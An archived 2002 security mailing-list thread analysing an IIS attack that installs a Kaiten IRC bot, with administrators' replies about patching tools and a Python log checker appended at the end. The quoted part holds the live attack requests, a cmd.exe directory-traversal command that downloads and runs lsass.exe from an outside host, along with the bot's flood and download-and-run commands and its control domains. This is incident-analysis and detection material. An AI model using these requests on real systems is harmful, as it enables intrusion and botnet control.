If you want something that automatically installs only patches you approve, take a look at http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp

It might help you in your environment.

> -----Original Message-----
> From: zeno [mailto:bugtraqat_private]
> Sent: Tuesday, September 24, 2002 2:08 PM
> To: John Campbell
> Cc: incidentsat_private
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
> > Windows Update from you-know-who actually does what you describe. I'd
> > always been leery of it, but tried it out recently when setting up a
> > W2K test server, and it performed as advertised. It did take several
> > iterations to get everything updated, owing to various dependencies.
>
> When I used windows update it downloaded the patches but didn't install
> them. I had to manually go through each one. While this isn't a big deal
> I am looking for something 100 percent automated with install of the
> patches. Perhaps I'm missing something; I deal mostly with unix.
>
> - zeno
>
> > Regards,
> >
> > John Campbell, CISSP, GCWN
> > Information Security Engineer
> > Washington School Information Processing Cooperative (WSIPC)
> > Everett, Washington, USA
> >
> > -----Original Message-----
> > From: zeno [mailto:bugtraqat_private]
> > Sent: Tuesday, September 24, 2002 11:29 AM
> > To: Mark Challender
> > Cc: 'pjat_private'; incidentsat_private
> > Subject: Re: new IIS worm? (rcp lsass.exe)
> >
> > > Hardening of IIS with the tools available at Microsoft and using
> > > URLSCAN with the EXE blocking on will stop these attacks.
> > >
> > > Patch, patch, patch, recheck the patches and use URLSCAN!
> >
> > Does anyone know of a gui windows tool that scans your system and
> > provides you with a list of needed patches, and then allows you to
> > select, and have it autodownload and install them? I can't seem to
> > find one (needed mostly for iis).
> >
> > - zenoat_private
> >
> > > Mark Challender
> > > Network Administrator
> > >
> > > ==================
> > > Veni, Vidi, Geeki
> > > ==================
> > >
> > > -----Original Message-----
> > > From: pjat_private [mailto:pjat_private]
> > > Sent: Monday, September 23, 2002 3:27 AM
> > > To: incidentsat_private
> > > Subject: Re: new IIS worm? (rcp lsass.exe)
> > >
> > > Christian Mock:
> > >
> > > > Then it seems to go after the web servers, sending the following:
> > > >
> > > > GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
> > > >
> > > > and
> > > >
> > > > GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
> > > >
> > > > I've been able to get hold of that lsass.exe binary (9728 bytes), but
> > > > I lack the skills to analyze it; I'll happily mail it to anybody who
> > > > asks.
> > >
> > > We have seen this attack from 4 different sources since Sept. 16, and
> > > have informed the owner of 64.21.95.7 and downloaded the lsass.exe for
> > > investigation.
> > >
> > > Based on the attack rate this is most likely a scripted or manual
> > > attack, not a worm.
> > >
> > > Judging from the embedded string in this compressed binary it
> > > appears to be an IRC bot based on the kaiten.c code written by
> > > contem@efnet, the author of the Slapper worm:
> > >
> > > Kaiten Win32 API version 2002 by contem@efnet
> > >
> > > The binary contains these domain names, most likely IRC servers used
> > > for controlling the bot:
> > >
> > > telsa5.mine.nu (Korea)
> > > irc.logicfive.net (Taiwan)
> > > moncredo.shacknet.nu (USA)
> > > telsacredo.shacknet.nu (USA)
> > > lar.ath.cx (Taiwan)
> > >
> > > The program accepts commands to make various DOS attacks or download
> > > new version or executables with http:
> > >
> > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> > > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> > > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> > > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> > > NOTICE %s :NICK <nick> = Changes the nick of the client
> > > NOTICE %s :DISABLE <pass> = Disables all packeting from this client
> > > NOTICE %s :ENABLE <pass> = Enables all packeting from this client
> > > NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
> > > NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
> > > NOTICE %s :GET <http address> = Downloads a file off the web
> > > NOTICE %s :ADDSERVER <server> = Adds a server to the list
> > > NOTICE %s :DELSERVER <server> = Deletes a server from the list
> > > NOTICE %s :LISTSERVERS = Lists server on the list
> > > NOTICE %s :KILL = Kills the client
> > > NOTICE %s :VERSION = Requests version of client
> > > NOTICE %s :HELP = Displays this
> > >
> > > There seems also to be a default account and password in the German
> > > language included in this specific version of Kaiten.
> > >
> > > The IIS attack that tries to inject this Trojan usually has another
> > > URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a
> > > connection to port 6667 (IRC) on chat.vtm.be.
> > >
> > > Peter Jelver
> > > ...
> > >
> > > eSec A/S
> > >
> > > http://www.esec.dk
> > > ............................................................................
> > >
> > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
> > >
> > > ----------------------------------------------------------------------------
> > > This list is provided by the SecurityFocus ARIS analyzer service.
> > > For more information on this free incident handling, management
> > > and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 26 2002 - 22:16:45 PDT
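One way a defender could flag the requests quoted in this thread in IIS logs, as an added example that is not part of the original posts: a small Python checker that double-decodes the URI (so both `%5c` and the double-encoded `%255c` normalize to a backslash), then tags traversal, cmd.exe execution, rcp downloads and CONNECT attempts to port 6667. The log layout and the client addresses are constructed for the example; the request strings, 64.21.95.7 and chat.vtm.be come from the thread.

```python
from urllib.parse import unquote

# Constructed sample lines in a simplified W3C IIS log layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# (traffic modelled on the requests quoted in the thread, not a real capture).
SAMPLE_LOG = """\
2002-09-23 03:27:10 10.0.0.5 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 200
2002-09-23 03:27:11 10.0.0.5 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 200
2002-09-23 03:27:12 10.0.0.5 CONNECT chat.vtm.be:6667 - 405
2002-09-23 03:28:00 192.0.2.7 GET /index.html - 200
2002-09-23 03:28:05 192.0.2.8 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404
"""

def normalize(uri):
    """Decode twice (catches %255c double-encoding), map '\\' to '/', lowercase."""
    return unquote(unquote(uri)).replace("\\", "/").lower()

def classify(line):
    """Return a sorted list of tags explaining why a log line is suspicious."""
    fields = line.split()
    if len(fields) < 7:
        return []
    _date, _time, _ip, method, stem, query, _status = fields[:7]
    path = normalize(stem)
    args = normalize(query.replace("+", " "))   # IIS logs '+' for spaces in the query
    tags = set()
    if "../" in path:
        tags.add("traversal")
    if path.endswith("/cmd.exe"):
        tags.add("cmd.exe")
    if "rcp " in args:
        tags.add("rcp-download")
    if method.upper() == "CONNECT" and stem.endswith(":6667"):
        tags.add("irc-proxy")
    return sorted(tags)

def scan(log_text):
    """Return (line_number, client_ip, tags) for every flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits.append((n, line.split()[2], tags))
    return hits

if __name__ == "__main__":
    for n, ip, tags in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(tags)}")
```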